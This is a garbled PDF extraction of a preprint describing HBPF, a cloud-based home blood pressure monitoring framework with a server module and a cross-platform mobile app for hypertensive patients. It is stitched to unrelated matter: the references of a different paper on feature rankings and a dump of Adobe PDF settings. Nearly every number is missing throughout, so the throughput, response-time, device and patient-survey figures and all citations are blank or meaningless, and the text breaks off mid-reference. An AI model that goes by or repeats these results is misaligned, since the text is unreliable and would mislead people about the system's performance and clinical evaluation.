slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /bioinformatics/btm http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /comjnl/ . . http://dx.doi.org/ . /peerj.preprints. v http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /bioinformatics/btm http://dx.doi.org/ . /peerj-cs. http://archive.ics.uci.edu/ml/index.php http://dx.doi.org/ . /a: http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ saeys y, abeel t, de peer yv. . robust feature selection using ensemble feature selection techniques. in: daelemans w, goethals b, morik k, eds. machine learning and knowledge discovery in databases. ecml pkdd , lecture notes in computer science. vol. . berlin: springer, – . slavkov i, petković m, kocev d, džeroski s. . quantitative score for assessing the quality of feature rankings. informatica ( ): – . tsang iw, kwok jt, cheung p-m. . core vector machines: fast svm training on very large data sets. journal of machine learning research : – . verikas a, gelzinis a, bacauskiene m. . mining data with random forests: a survey and results of new tests. pattern recognition ( ): – doi . /j.patcog. . . . wang y, jha s, chaudhuri k. . analyzing the robustness of nearest neighbors to adversarial examples. in: proceedings of the th international conference on machine learning (icml), pmlr . stockholm, sweden, – . xu h, caramanis c, mannor s. . robustness and regularization of support vector machines. journal of machine learning research : – . slavkov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.patcog. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ error curves for evaluating the quality of feature rankings introduction related work a method for evaluating feature rankings empirical evaluation of ffa/rfa curve properties feature ranking comparison on real-worlds datasets conclusions appendix appendix appendix appendix references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice hbpf: a home blood pressure framework with sla guarantees to follow up hypertensive patients a peer-reviewed version of this preprint was published in peerj on june . view the peer-reviewed version (peerj.com/articles/cs- ), which is the preferred citable publication unless you specifically need to cite this preprint. cuadrado j, vilaplana j, mateo j, solsona f, solsona s, rius j, alves r, camafort m, torres g, betriu a, gutierrez jm, fernández e. . hbpf: a home blood pressure framework with sla guarantees to follow up hypertensive patients. peerj computer science :e https://doi.org/ . /peerj-cs. https://doi.org/ . /peerj-cs. https://doi.org/ . /peerj-cs. hbpf: a home blood pressure framework with sla guarantees to follow up hypertensive patients josep cuadrado, jordi vilaplana, jordi mateo, francesc solsona, sara solsona, josep rius, rui alves, miquel camafort hypertension or high blood pressure is a condition on the rise. not only does it affect the elderly but is also increasingly spreading to younger sectors of the population. treating it involves exhaustive monitoring of patients. a tool adapted to the particular requirements of hypertension can greatly facilitate monitoring and diagnosis. this paper presents hbpf, an efficient cloud-based home blood pressure framework. this allows hypertensive patients to communicate with their health-care centers, thus facilitating monitoring for both patients and clinicians. hbpf provides a complete, efficient, and cross-platform framework to follow up hypertensive patients with an sla guarantee. response time below one second for , requests and % increase in peak throughput going from one to virtual machines were obtained. in addition, a mobile app (bp) for android and ios with a user-friendly interface is also provided to facilitate following up hypertensive patients. among them, between % and % favorably evaluated the tool. bp can be downloaded for free from the website hesoft group repository (http://www.hesoftgroup.eu). peerj preprints | https://doi.org/ . /peerj.preprints. v | cc-by . open access | rec: may , publ: may hbpf: a home blood pressure framework with sla guarantees to follow up hypertensive patients josep cuadradoa, jordi vilaplanab, jordi mateob, francesc solsonaa,b, , sara solsonaa, josep riusb, rui alvesc, miquel camafortd ahesoft group, partida bovà, , e- , lleida, spain bdepartment of computer science & inspires, university of lleida. jaume ii , e- lleida, spain cdepartament of basic medical sciences & irblleida, university of lleida, avda. alcalde rovira roure , e- lleida, spain. ddept. of internal medicine, clinical institute for medicine and dermatology, hospital cĺınic, institute of biomedical research agust́ı pi i sunyer (idibaps), university of barcelona, hospital universitari villarroel , e- , barcelona, spain. abstract hypertension or high blood pressure is a condition on the rise. not only does it affect the elderly but is also increasingly spreading to younger sectors of the population. treating it involves exhaustive monitoring of patients. a tool adapted to the particular requirements of hypertension can greatly facilitate monitoring and diagnosis. this paper presents hbpf, an efficient cloud-based home blood pres- sure framework. this allows hypertensive patients to communicate with their health-care centers, thus facilitating monitoring for both patients and clinicians. hbpf provides a complete, efficient, and cross-platform frame- work to follow up hypertensive patients with an sla guarantee. response time below one second for requests and % increase in peak through- put going from one to three virtual machines were obtained. in addition, a mobile app (bp) for android and ios, with a user-friendly interface, is also provided to facilitate following up hypertensive patients. among them, be- tween % and % favorably evaluated the tool. bp can be downloaded for free from the website hesoft group repository (http://www.hesoftgroup.eu). email addresses: jcuadrado@hesoftgroup.eu (josep cuadrado), jordi@diei.udl.cat (jordi vilaplana), jmateo@diei.udl.cat (jordi mateo), francesc@diei.udl.cat (francesc solsona), sara@hesoftgroup.eu (sara solsona), jrius@diei.udl.cat (josep rius), ralves@cmb.udl.cat (rui alves), camafort@clinic.cat (miquel camafort) corresponding author . introduction hypertension is one of the most important risk factors in cardiovascular diseases, the leading cause of death worldwide [ ]. it affects about % of the adult population, a percentage that increases with age [ ]. home blood pressure (hbp) consists of patients taking readings at home and registering these using a digital device. the patients then send the readings to a health professional who is responsible for taking appropriate action [ ]. in a recent scientific article, the american heart association concluded that hbp monitoring should become a routine component of blood pressure measurement in the majority of patients with known or suspected hyperten- sion [ ]. hbp readings may also be better predictors of cardiovascular and renal outcomes than surgery readings [ , ]. furthermore, hbp readings provide a more accurate assessment of true blood pressure than alternative measurement methods, such as surgery blood pressure or rapid titration of antihypertensive therapy. they also avoid the white-coat syndrome and fa- cilitate the identification of masked hypertension, leading to a greater patient involvement in managing hypertension, a condition that is typically asymp- tomatic [ ]. having ways to monitor hbp in a continuous and rigorous way, with a fluid communication between patient and doctor may be crucial in ensuring satisfactory control of blood pressure, which is currently a great challenge. information and communication technology (ict) can play an important role in achieving this monitoring capabilities [ , ]. in this context, we developed and present hbpf (home blood pressure framework). hbpf is made up of two parts, the hm (hypertension module) server and the bp (blood pressure monitoring) mobile app. hbpf provides high performance for a given sla (service level agree- ment). an sla is a contract negotiated and agreed between a customer and a service provider for which a customer only pays for the resources and services used according to negotiated performance requirements at a given price [ , ]. throughput is one of the most important performance metric in a cloud-computing context [ , ]. it was also the performance parameter chosen in this work to fix the sla. frameworks such as hbpf generate large amounts of data that need to be continuously stored, processed, and available. this require the use of cloud computing services [ ]. earlier versions of the concept underlying hbpf [ , , ] were tested in a private cloud-based server, before mov- ing the hm into a real-world cloud environment. these applications used sms communications between clinicians and patients. this was limiting in many ways. the current platform uses internet communication, providing physicians with access to standard medical records and allowing them to write reports and to follow up and communicate (i.e. charting and sending videos) with patients by means of hbpf. efforts were made to design a scal- able framework when the number of both patients and hospitals increased by providing service level agreement (sla) guarantees [ , , , , ]. the remainder of the paper is organized as follows. section details the related work addressing the problem of tele-moritoring hypertensive patients. in section . , we present hm. section . is devoted to explaining the op- eration and functionality of the bp app. this app and its performance is evaluated in section . finally, section outlines the main conclusions and future work. . related work there is a potentially important role for novel techniques to lower er- rors in collecting blood pressure readings, especially in primary care, where management of hypertension mainly takes place [ , ]. one such techniques is mhealth - health care and public health practice supported by mobile devices [ ]. earlier work identified web sites that provided functionality to manage and present home blood-pressure readings. out of these, could be freely used. a comparison between these web sites was carried out between june and august [ ]. the results showed that none of these web sites were directly linked to common electronic medical records. in addition, none of them provided any tools for sending alert messages in any format. studies have shown the positive impact of mhealth on adherence-related behavior among patients. for example, short message service (sms) ap- pointment reminders have led to an increase in attendance of hiv [ ], tu- berculosis [ ], and quitting tobacco patients [ , ]. patient-physician short messaging through a telemedicine system was also tested as a means to improve control of hypertension in the follow-up of medium-to-low-risk patients in primary care [ ]. a control group (cg) recorded the data on paper and could only deliver it to their gp personally in routine visits. this study showed that % of the telemedicine-enabled patients strictly adhered to the treatment protocol, versus % in the cg. this suggests that more flexible and continuous ways of interaction and follow up of patients might have a greater impact in treatment adherence. a study among mhealth articles assessed the role of adherence of patients to chronic diseases management [ ]. . % ( / ) of studies used sms exclusively and . % used specialized software or a smartphone app. these programs focused mainly on a combination of devices, such as an electrocardiogram or a bp monitor. as a conclusion, the authors suggested that future mhealth tools need to provide optimal user-interfaces, or targeted motivational messages. with all this in mind, we designed and implemented hbpf to include a flexible and user friendly interface that provides motivational messages to the patients and enable immediate and real-time communication between patient and physician by means of the bp app. in addition, the app provides self- monitoring, reading sampling, charts, reports, tips, and advice, in line with other existing hypertension apps (see table , for a comparison of the main features between the various apps). however, with the exception of bp, none of the apps features on-line physician support for the patient, chat between physician and patient, or broadcasting communication among a group of patients. in addition, bp is the only app available for both, ios and android operating systems. app dc nc charts rh ab ap os bp lite no no yes yes no no ios ibp no no yes yes no no ios ibptouch no no yes yes no no ios bpmonitor no no yes yes no no ios bp yes yes yes yes no no ios/android icare bp monitor no no yes yes no yes android bp watch no no yes yes no no android finger bp prank no no no no no yes android table : comparison between bp with other similar hypertension apps. app: application name. dc: doctor chat (direct chatting with the physician). nc: nearby centers (pro- vides information about the distance to specialized centers). charts: graphical evolution charts. rh: readings’ history. ab: automatic sampling of the blood pressure by means of an external device. ap: automatic sampling of the pulse rates by means of an external device. os: operating system. https://itunes.apple.com/us/app/blood-pressure-lite-bp-tracker/id ?mt= https://itunes.apple.com/us/app/ibp-blood-pressure/id ?mt= https://itunes.apple.com/kh/app/ibptouch-blood-pressure-tracking/id ?mt= https://itunes.apple.com/us/app/bpmonitor/id ?mt= http://www.hesoftgroup.eu/index.php?option=com_content&view=article&id= &itemid= https://play.google.com/store/apps/details?id=comm.cchong.bloodpressure https://play.google.com/store/apps/details?id=com.boxeelab.healthlete.bpwatch https://play.google.com/store/apps/details?id=com.galaxyfinger.fingerboodstar hbpf provides a means to communicate across a wide range of platforms and devices with a doctor, as does healthtap. in addition, hbpf provides a complete, efficient, and cross-platform framework to follow up hypertensive patients with an sla guarantee. furthermore, the transparent architecture of hbpf was designed to facilitate the involvement of additional third par- ties, and the integration with existing healthcare systems, while providing ad-hoc adaptation of monitoring parameters to each individual, in a similar way to [ ]. . hbpf fig. summarizes the overall operation of hbpf. first of all, patients send their readings with the bp app from a smart phone to the server ( ), via internet ( ). mobile clinician internet blood pressure pa ent database server hm bpcontrol figure : hbpf operation. on receiving a message, the server redirects it to the cloud-based hm. hm is responsible for checking and saving the readings in a database. clinicians can inspect the patients’ readings from the database ( ). next, depending on the data and the criteria specified by the clinicians, hm responds to the patient’s mobile with another message through the server ( and ). hm also provides additional facilities to follow up hypertensive patients. the main objective of the bp app is to extend the communication systems of the hm tool, adding the most widely used communication functionalities for smartphones. these include instant messaging (chat), among others. in this way, patients participate actively in controlling their disease and follow their medical evolution, communicating with the medical team in real time. http://www.healthtap.com . . hypertension module (hm) figure : hm. the names that appear in the figure are invented. the hypertension module (hm) (see fig. ) was designed for collect- ing and managing data from hypertensive patients. its functions are to record and print/display measurement statistics, show the evolution of pa- tients graphically using charts, provide instant messaging tools (i.e. chat), aid clinicians with diagnose, and generate alerts or suggestions for treatment, patient monitoring, medication and nutrition, among others. one of the main features of hm is that it plots patients’ readings (systole and diastole blood pressures and pulse). these readings can be registered automatically by means of the bp app or manually by the clinicians. hm automatically calculates the mean values for each day, showing an overall average value per day in the plot. hm performs a data verification check, in order to avoid incorrect or invalid measurements, such as negative or physically implausible values. hm allows target limits from both systole and diastole blood pressures to be established individually depending on the characteristics of each patient. if these limits are exceeded, an alert is shown on the main page of the hm tool, so that clinicians can act quickly and, if needed, intervene or send an alert message to the patient. hm is currently designed to communicate with the patients through an internet connection (via a smartphone with the bp app). this somewhat determines the design of the architecture, currently made up of a server and a database (see fig. ). in order to increase the reliability and availability of the overall system, the server can contain multiple processing units, like processors, cores, or virtual machines. as the current web servers are usually mounted on cloud systems, “vms” is the terminology used from here on. an analysis of the performance provided by the server according to the number of vms is performed in the results section (sec. ). the clinician is responsible for registering the patient in the hm tool. once registration is done, the patient must send the blood pressure mea- sured at home through bp on a weekly or biweekly basis, depending on the requirements established by the doctor. this design feature facilitates future deployment of personalized medicine approaches to the treatment and follow up of hypertensive patients. according to the personalized monitoring plan of each patient, the system periodically reminds the patient to send their blood pressure readings. the system monitors that the data format and values it receives are appropriate, before recording them and sending a message to the bp app. the contents of the message depend on the information entered by the medical team and on the readings provided by the patients. . . . hm architecture the cloud-based architecture of hm scales easily with increasing number of patients, physicians, and hospitals. this is done by using the sla to adjust the number of available virtual machines (vms, widely used in cloud computing environments) and the number of requests entering the module (see [ , , , ] for more information). the current hm architecture is made up of hosts (nodes), each with one amd opteron processor of cores running at . ghz (see fig ). we plan to add more hosts as the system grows. note that nodes can be different, conforming a heterogeneous framework. all the software technolo- gies used to implement hbpf were carefully selected with several criteria in mind. first, they had to be open-source, in order to facilitate future shared development of the apps. in addition, these technologies had to be robust, efficient, and be widely deployed and supported. vms are deployed across the hosts on top of the openstack . openstack is an open source cloud plat- openstack. http://www.openstack.org form that allows to manage and deploy large networks of virtual machines. all the vms run ubuntu gnu/linux . . - -virtual x . we believe in a distributed design because the degree of administrative and geographic scalability increases with the number of hosts. apache scheduleer mysql cluster vm vm vm vm vm vm host host openstack openstack task firewall ajp figure : hm architecture. the scheduler is mapped into a vm with mb ram and core in host . it is implemented using the scheduler of apache tomcat . the rest of vms, that service the requesting tasks, are provided with gb and cores. these vms are the computing vm nodes, where the hm module copies (each performing the same operation) are deployed on top of apache tomcat , an open-source web server developed by the apache software foundation (asf). task scheduling determines which vm executes the tasks. vm consol- idation instead determines the mapping of vms to hosts. the hm task scheduling and vm consolidation follows a round-robin policy, which states that tasks (vms) are assigned to vms (hosts) by following a circular ring ordering. all vms are configured with the ajp (apache jserv protocol - apache tomcat connector) protocol enabled, which is used by the scheduler to com- apache tomcat. http://tomcat.apache.org/ http://httpd.apache.org/docs/ . /mod/mod_proxy_balancer.html http://tomcat.apache.org/ http://tomcat.apache.org/connectors-doc/ajp/ajpv a.html municate with the nodes. ajp is a protocol that can proxy inbound requests from a web server (apache http server) to an application server (tomcat). the database is implemented using a mysql cluster , a technology that provides shared-nothing clustering and auto-sharding for the mysql database management system. the database is distributed between the hosts (nodes) making up the cloud framework. the mysql cluster is im- plemented with vms with gb ram and cores (of two different hosts). having multiple computing and data-sites ensures a high degree of load and administrative scalability and reliability. . . bp bp is designed to update and expand the current system of communi- cation with the hm tool, offering an application that was not previously available for smart phones. bp is a user-friendly app that extends the hm services to android and ios smartphones. . . . bp design currently, there are many alternative technologies for developing applica- tions for mobile devices. an important design requirement was that the ap- plication should be compatible with all the major platforms android and ios. because of this, the bp app was implemented using html, css, javascript, jquery mobile and phonegap . phonegap is an open-source development tool for creating cross-platform mobile applications with countless libraries available for use. phonegap has apis to control i/o devices efficiently (such as cameras, gps, databases, file system, etc.) in a similar way to those obtained with native code. phonegap currently supports the two mainstream platforms (android and ios). the features that retrieve information from hm need to establish a con- nection by means of web services. this ensures low data capacity require- ments and avoids legal problems, as medical data is only stored in hm instead of in each individual smartphone. however, this introduces a low penalty in obtaining the required information remotely, although it does not signifi- cantly affect the user experience. we created ad hoc web services, which are used to exchange data in json format between the clients (bp instances) and the server (hm). mysql cluster. https://www.mysql.com/products/cluster/ phonegap. http://phonegap.com. . . . bp operation the bp app can be used to register patients, edit their profile, download or upload data regarding blood pressure and pulse readings from/to the hm server, visualize informative videos uploaded by the clinicians, analyze pa- tient trends by plotting and listing the evolution of the patients’ state and readings, and provide information about collaborating hospitals. finally bp can be used for chatting (instant messaging) between patients and clinicians. whenever required, a patient can easily ask the doctor a question through the chat window. the application also helps the patients with useful advice. once the blood pressures and the pulse have been sent, the app immediately shows the results of the analysis (done in hm) through a traffic light indicating the status of the patient. in addition, a short message indicates medical advice. the medical advice depends on the results of the analysis of the readings. there are three possible states (light colors) and three associated mes- sages: good (green). everything was fine. remember to keep measuring and sending your pressure readings. regular (yellow). do not forget, salt-free diet. remember to take the medication and do some physical activity. bad (red). we have seen your records, do not worry. we will contact you to bring your next clinical appointment forward. bp can show a graphic evolution of the patients’ measurements. different types of visualization can be chosen. by clicking global, the plot of the blood pressure (fig ) appears. the morning and afternoon buttons separate the samples by these times of day. start and finish dates can be selected. alternatively, , and months selectors are available. . results here we report a series of benchmark experiments used to evaluate the performance and efficiency of hbpf. we benchmark hm and the bp app separately and present the results in sections . and . respectively. the main performance criteria by which the hm server and the bp app should be evaluated are only partially overlapping. because of this we sep- arately evaluated the server and the app. for the hm server we evaluated figure : consultation readings for blood pressure. response time, throughput, and scalability. for the bp app, we evaluated startup time, communication time and usability. . . hm . . . testbed experiments on the hm tool were carried out on virtual machines [v m . . . v m ] deployed over openstack, installed on a host with amd opteron processor with cores running at . ghz each. to emulate vm heterogeneity, we set v m . . . v m with gb ram and cores. application stress tests via http requests were performed using the apache jmeter tool, which measures performance and functional behavior. these requests simulated patients consulting or introducing their data and clinicians using hm. the effect of number of simultaneous requests on hbpf performance was tested by systematically varying the number of users. there were generated requests per user. all users would be performing their requests within a single sec. period. the time between user requests was constant and therefore these requests were uniformly distributed in the second test interval. jmeter. http://jmeter.apache.org/ the performance metric we used was the response time and through- put, as these parameters are widely used for measuring system efficiency. throughput was also the parameter chosen to fix the sla. . . . response time testing the response time of the application was done using all five avail- able vms. fig. summarizes the response time of the system in terms of the median, average and % line when the number of users increased from to . the % line (or th percentile) is the value below which % of the samples were processed in less than the time specified on the y-axis. this metric is more meaningful than the median or average value in terms of sla (service level agreement). although the system starts to overload at , requests (i.e. users), the average and median response time still remains below second (the users will not notice a lack of interactivity with the system). obviously, worser results were obtained for the % line ( , s). t im e ( m s ) # requests (thousands) % line average median figure : evolution of response time (average, median and % line). . . . throughput another measure of efficiency is throughput (tr), which is defined as the number of requests served per unit of time: tr = number of requests time ( ) here, we benchmark the effect of changing the number of available vms on the tr and the number of users from to . fig. compares the t h ro u g h p u t # requests (thousands) vm vm vm figure : evolution of system throughput when using , and vms. tr of the system when we use one (vm ), three (vm -vm ), or five vms (vm -vm ). fig. summarizes the results. a general feature of the system’s response is that tr increases linearly with the number of requests, until it peaks at approximately , requests ( , for vm). after this threshold, tr performance decreases slightly and the sla is not guaranteed. we note that the sla should be fixed according to the required tr, depending on the number of requests and the number of vms available. this behaviour is consistent with previous simulations of a similar model system, using an approach based on queuing theory[ , ]. going from one to three vms leads to an increase in peak tr of , %. in contrast, going from three to five vms leads to an increase in peak tr of approximately , %. this suggests that peak relative performance in- crement decreases every time additional vms are activated. internal tests suggest that this loss was due to the delay introduced by the remote commu- nication between vms located in different cores, which is a known frequent bottleneck in distributed computing applications. thus, as was the case in the simulated system [ , ], we face a situation where our system overloads, leading to a significant increase in the response time and a decrease in tr. however, in contrast with the simulated system, adding more vms to the real hbpf system only partially solves the problem, and a law of diminishing returns is observed with an increase in number of vms. overall, these experiments suggests that the most efficient strategy for distributing work between vms allocated to hbpf is to first deploy work to local vms. when these are saturated, work should then be sent to remote vms. . . . scalability we also investigated the scalability of the system in its cloud environ- ment by using an event-driven simulator to test the behaviour of that en- vironment. we use the cloudsim . . software [ ] in these tests because it allowed us to easily emulate the hbpf architecture presented and evalu- ated in sections . . and . respectively. cloudsim allows the behaviour of the amd opteron , (the one chosen for this simulation) to be emulated. the cloudsim task scheduling and vm consolidation followed a round-robin policy. as we chose the same processor and scheduling policies as the hm architecture (see section . . ), the results obtained in the simulation should be directly applicable to the real system. fig. shows the system behavior when scaling it by increasing the num- ber of vms and hosts. vms were made up of cores and gb each. as in section . , one host was made up of one processor. the simulation en- vironment was carried out by executing , tasks with a size of , instructions each. further experiments varying these parameters gave pro- portional results. hosts vm figure : execution times depending on the number of vms and the number of hosts. we can appreciate that increasing the number of vms and hosts signifi- cantly decreases the total execution time (in time units) of the overall tasks. fig. shows that by adding vms, the performance approaches asymptoti- cally to a limit where it does not have enough computational resources (ram, cpus, etc.. making up the hosts) to map the tasks, and so the execution time stabilizes. similar behavior occurs when adding more hosts without adding more vms. . . bp . . . performance typically, two important bottlenecks in application performance are the start up of the app and the operational processes in which that app accesses internet. bp was installed and tested on smartphones and tablets running modern versions of android and ios. the devices and operating systems used to verify the correct operation of bp are listed in table . this table shows the elapsed time of the start up for bp. these times were the average of independent measurements. device operating system bp start up time samsung galaxy s android v. . . . samsung galaxy s android v. . . nexus android v. . . . ipad ios v. . . iphone ios v. . . table : performance comparison between devices (in ms). the cross-reference apis used by phonegap introduced a considerable penalisation in the bp start up time ( ms). however, the application performed well in all the tested devices. in all cases, overall response time fell below one second, which guarantees that the user’s flow of thought is uninterrupted [ ]. the communication time sending a chat message to hm was also mea- sured. to do so, we computed the average time for all android and ios devices. we tested two types of connections, wifi (with mb/s download and mb/s upload speed) and g data internet. each experiment was repeated times per device. communications were very fast, taking on average ms for wifi and ms for g. wifi bandwidth was entirely dedicated to communications done using the bp app. this validates the design of the communication mechanism between the app and hm. . . . usability here we perform a preliminary evaluation of bp’s usability. this was done by asking both, clinicians and patients, to fill in a google-forms questionnaire. this questionnaire was sent by the hm server to all registered patients and the clinicians of the clinic hospital of barcelona. patients and all the clinicians answered it. table summarizes the results of this evaluation. this table only shows the affirmative answers. clinicians are highly satisfied with the app and all are convinced of its usefulness and efficiency. in addition, they don’t find its use monotonous. in addition, two of the three clinicians found bp very easy to use. we note that these evaluations are anecdotal and a larger number of clinicians must answer the survey before we can come to a reasonable conclusion about usability of bp from the clinician’s point of view. in terms of user evaluation, we focus more on the feedback from patients than that from clinicians for two reasons. first, patients will be the vast majority of final bp users. second, we need to obtain input from additional clinicians, given the low number of professionals that answered the survey. between % and % of all patients reported full satisfaction with the various aspects of using the bp app, indicating that they are mostly happy with the application. the weakest point we detected was that % of the patients found the use of bp monotonous. this is in striking difference with the clinicians that had the opposite opinion. we need to further and specifically understand what the patients found boring in order to improve that aspect of the app. in general, clinicians and patients recognized the usefulness of the app for remote monitoring of hypertensive patients and to reduce traveling costs. we note that we are now in the process of compiling patient and clinician suggestions to help us improve the user-friendliness of the app. . conclusions this article presents hbpf, an efficient ehealth framework to manage and follow up hypertensive patients. hbpf comes with with sla guarantees and it can significantly reduce the costs associated with patient travelling. its efficiency and sla guarantees are provided by hm, the hbpf server component. question patients clinicians would you recommend it? it is useful for monitoring hypertension? is it use monotonous? is it easy to use? . is it useful to reduce the visits to the hospital? table : evaluating the use of bp. affirmative answers (in %). the use of phonegap when implementing bp was a successful decision because it has proven to be a very suitable framework for cross-platform applications, increasing its flexibility and functionality. we tested its perfor- mance in the ios and android operating systems on both smartphones and tablets. despite the difficulties of adapting the interface in some cases, the results achieved were satisfactory. however, the user experience could possibly be improved by using native development due to the fact that phonegap has a slightly higher response time than native applications. accordingly, we are migrating the current ap- plication to native environments for ios and android platforms. we expect to improve this aspect, which we assume will be temporary. we will then compare the performance of phonegap against native frameworks. future trends are aimed at testing how the use of this comprehensive and personalized monitoring tool can minimize the risk of heart attacks, strokes and other effects of hypertension. we plan to add a wireless or bluetooth interface to the sampling device without requiring the patient to manually submit the data, thus facilitating automatic data transfer and avoiding tran- scription errors. moreover, we plan to implement data analytics so we can provide aggregated data to the clinicians in order to detect trends and pat- terns within their patient groups. references [ ] r craig, j mindell, eds. health survey for england . london: her majesty’s stationery office. . [ ] hypertension in the very old; prevalence, awareness, treatment and con- trol: a cross-sectional population-based study in a spanish municipality. http://www.biomedcentral.com/ - / / . [ ] pickering tg, miller nh, ogedegbe g, krakoff lr, artinian nt, goff d, american heart association, american society of hypertension, pre- ventive cardiovascular nurses association. call to action on use and re- imbursement for home blood pressure monitoring: a joint scientific state- ment from the american heart association, american society of hyper- tension, and preventive cardiovascular nurses association. j cardiovasc nurs, ( ): - . . [ ] ohkubo t, imai y, tsuji i, nagai k, kato j, kikuchi n, nishiyama a, aihara a, sekino m, kikuya m, ito s, satoh h, hisamichi s. home blood pressure measurement has a stronger predictive power for mortality than does screening blood pressure measurement: a population-based observation in ohasama, japan. j hypertens, ( ): - . . [ ] bobrie g, chatellier g, genes n, clerson p, vaur l, vaisse b, menard j, mallion jm. cardiovascular prognosis of masked hypertension detected by blood pressure self-measurement in elderly treated hypertensive pa- tients. jama, ( ): - . . [ ] mcmanus rj, mant j, bray ep, holder r, jones mi, greenfield s, kaambwa b, banting m, bryan s, little p, williams b, hobbs fd. tele- 